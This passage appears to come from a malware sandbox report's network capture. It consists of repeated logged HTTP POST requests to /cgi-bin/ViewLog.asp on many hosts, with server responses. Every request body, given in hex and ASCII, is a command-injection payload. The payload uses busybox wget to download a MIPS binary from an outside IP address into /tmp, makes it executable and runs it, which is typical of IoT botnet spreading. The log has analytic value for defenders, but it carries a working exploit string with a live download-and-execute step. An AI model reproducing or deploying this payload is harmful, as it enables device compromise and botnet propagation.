                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              754192.168.2.144964494.121.124.2368080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:19.969899893 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              755192.168.2.144120294.120.50.2088080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:19.969971895 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              756192.168.2.144749262.29.120.168080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:19.972343922 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              757192.168.2.145204085.184.248.1598080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:20.043200970 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              758192.168.2.145805662.29.94.38080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:20.068674088 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              759192.168.2.144922662.217.127.1398080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:20.096148014 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:20.323139906 CET672INHTTP/1.1 404 Not Found
                                              Date: Thu, 23 Nov 2023 04:18:20 GMT
                                              Server: Apache/2.4.10 (Debian)
                                              Content-Length: 426
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p><p>Additionally, a 500 Internal Server Errorerror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at 192.168.0.14 Port 80</address></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              760192.168.2.144337031.33.14.2088080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:20.219719887 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:20.768731117 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:21.856688976 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              761192.168.2.144862885.243.36.218080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:20.288587093 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:21.408750057 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:21.630884886 CET90INHTTP/1.1 403 Forbidden


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              762192.168.2.145443685.89.40.1468080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:20.293530941 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              763192.168.2.145165294.122.69.2358080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:20.295691013 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:21.472728968 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:22.848659039 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              764192.168.2.1455536154.206.158.24923
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:20.316828966 CET233INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 38 3a 31 39 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:18:19Auth Result: .


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              765192.168.2.144579094.123.181.1428080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:20.399626017 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              766192.168.2.146069831.44.141.1208080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:20.399692059 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              767192.168.2.144860294.121.129.558080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:20.425494909 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              768192.168.2.143629231.170.55.1048080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:20.463006973 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:21.696698904 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              769192.168.2.144790031.136.82.1298080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:20.520023108 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:21.120903015 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
